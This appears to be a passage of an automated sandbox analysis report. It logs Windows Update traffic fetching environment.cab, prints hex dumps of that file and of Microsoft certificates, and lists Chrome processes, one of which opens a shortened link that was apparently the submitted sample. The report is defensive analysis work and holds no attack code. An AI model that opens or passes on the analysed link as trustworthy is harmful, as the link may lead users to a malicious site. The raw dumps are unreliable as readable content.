                                                      Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                      2024-10-23 21:30:03 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                      Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      28192.168.2.164923052.149.20.212443
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-23 21:30:04 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=UpOpLcHcw3dMKAK&MD=2vTvUBNv HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Accept: */*
                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                      Host: slscr.update.microsoft.com
                                                      2024-10-23 21:30:04 UTC560INHTTP/1.1 200 OK
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      Content-Type: application/octet-stream
                                                      Expires: -1
                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                      ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                      MS-CorrelationId: 97094997-13d8-42a3-8739-699a19a843cd
                                                      MS-RequestId: 01aebdef-52a9-47cf-8eb1-928cee6944f3
                                                      MS-CV: b2qjMCT30UGVilnr.0
                                                      X-Microsoft-SLSClientCache: 1440
                                                      Content-Disposition: attachment; filename=environment.cab
                                                      X-Content-Type-Options: nosniff
                                                      Date: Wed, 23 Oct 2024 21:30:03 GMT
                                                      Connection: close
                                                      Content-Length: 30005
                                                      2024-10-23 21:30:04 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                      Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                      2024-10-23 21:30:04 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                      Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:17:29:29
                                                      Start date:23/10/2024
                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                      Imagebase:0x7ff7f9810000
                                                      File size:3'242'272 bytes
                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:1
                                                      Start time:17:29:29
                                                      Start date:23/10/2024
                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1976,i,7542123173083046913,11597805470458725562,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                      Imagebase:0x7ff7f9810000
                                                      File size:3'242'272 bytes
                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:2
                                                      Start time:17:29:30
                                                      Start date:23/10/2024
                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://t.ly/2jKWO"
                                                      Imagebase:0x7ff7f9810000
                                                      File size:3'242'272 bytes
                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      No disassembly